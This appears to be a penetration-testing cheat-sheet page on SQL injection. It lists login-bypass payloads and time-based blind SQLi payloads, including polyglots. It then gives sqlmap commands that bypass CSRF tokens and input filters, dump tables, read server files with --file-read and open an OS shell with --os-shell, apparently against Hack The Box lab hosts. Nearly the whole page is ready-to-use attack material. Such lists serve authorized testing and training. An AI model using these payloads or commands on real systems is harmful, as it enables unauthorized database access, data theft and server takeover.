SQL Injection

Sql Injection Basic Payloads

admin' or '1'='1
admin')-- -
'OR 1=1' OR 1
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*

Advanced Blind SQL Payloads (XOR)

0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(6)))a)
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
(SELECT * FROM (SELECT(SLEEP(5)))a)
'%2b(select*from(select(sleep(5)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
');(SELECT 4564 FROM PG_SLEEP(5))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(20)))a)
'%2b(select*from(select(sleep(0)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(20),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true

# polyglots payloads:

if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/

SQLMAP Advanced Usage

CSRF-TOKEN Bypass with Sqlmap

If there is csrf-token validation and the request is being invalidated after sending to the server for the first time then we can use the following command, in the below command i have a token being sent in the post data so i will pass the token parameter to the sqlmap and the i will be able to get the sql injection otherwise my requests will be invalidated after the first request

 sqlmap -u 'http://94.237.53.3:35310/case8.php' -X POST --batch --dbs --data-raw 'id=1&t0ken=nWGqK9hl2slyU5W0grB27Hi7c6RPFxULCyhr6wKfKP0' --csrf-token=t0ken

and we got a successfull sql injection here.

Randomize any Parameter using Sqlmap

If there is a case where we need to change a value after every request we can use the randomize flag for that

sqlmap -u 'http://94.237.62.149:49975/case9.php?id=1&uid=2' --randomize=uid --batch

Because if i will not randomize the uid parameter my request will fail

SQLMAP Tamper Scripts to Bypass Filters

If <> signs are blocked then you can use tamper scripts, we can use --tamper=between flag and it will not use < > signs any more

sqlmap -u 'http://83.136.255.150:52936/case11.php?id=1*' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Connection: keep-alive' -H 'Cookie: cookie=HTB{r3fl3c73d_b4ck_2_m3}' -H 'Upgrade-Insecure-Requests: 1' --batch -D testdb -T flag11 --dump --tamper=between

we can see some more tamper scripts as well by doing

sqlmap --list-tamper

File Read using Sqlmap

we can use the --file-read flag

 sqlmap -u 'http://94.237.54.170:52316/?id=1*' --batch --file-read /var/www/html/flag.txt

OS-Shell using SqlMap

we can use --os-shell to get a reverse shell

 sqlmap -u 'http://94.237.54.170:52316/?id=1*' --batch --os-shell

PreviousXSS NextCommand Injection

Last updated 1 year ago

hashtagSql Injection Basic Payloads

hashtagAdvanced Blind SQL Payloads (XOR)

hashtagSQLMAP Advanced Usage

hashtagCSRF-TOKEN Bypass with Sqlmap

hashtagRandomize any Parameter using Sqlmap

hashtagSQLMAP Tamper Scripts to Bypass Filters

hashtagFile Read using Sqlmap

hashtagOS-Shell using SqlMap